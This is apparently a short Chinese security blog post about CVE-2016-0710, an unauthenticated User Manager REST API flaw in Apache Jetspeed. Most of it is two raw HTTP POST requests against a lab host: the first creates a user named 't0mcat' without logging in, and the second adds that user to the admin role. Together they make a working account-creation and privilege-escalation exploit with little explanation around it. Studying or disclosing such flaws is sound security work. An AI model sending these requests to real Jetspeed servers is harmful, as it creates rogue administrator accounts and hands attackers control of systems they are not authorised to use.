AD

ApacheJetspeed


  1. CVE-2016-0710 不安全的User Manager REST API


创建一个用户
POST /jetspeed/services/usermanager/users/?_type=json HTTP/1.1
Host: 192.168.2.5:8080
[…]
Content-Length: 130
Connection: close
name=t0mcat&password=password&password_confirm=password&user_name_given=TOM&user_name_family=cat&user_email=T0MCAT.COM&newrule=

会回应500错误,但用户会在后台创建成功。

将t0mcat加入到admin管理组
POST /jetspeed/services/usermanager/users/t0mcat/?_type=json HTTP/1.1
Host: 192.168.2.5:8080
[…]
Content-Length: 123
Connection: close
name=&password=&password_confirm=&user_name_given=&user_name_family=&user_email=&user_enabled=&roles=admin&rule=

将会回应返回“true”,并且创建成功;

评论

此博客中的热门博文

简单粗暴导出小米便签

我——终于一个人了

Ubiquiti_Networks_UniFi_Cloud_Key_authed_rce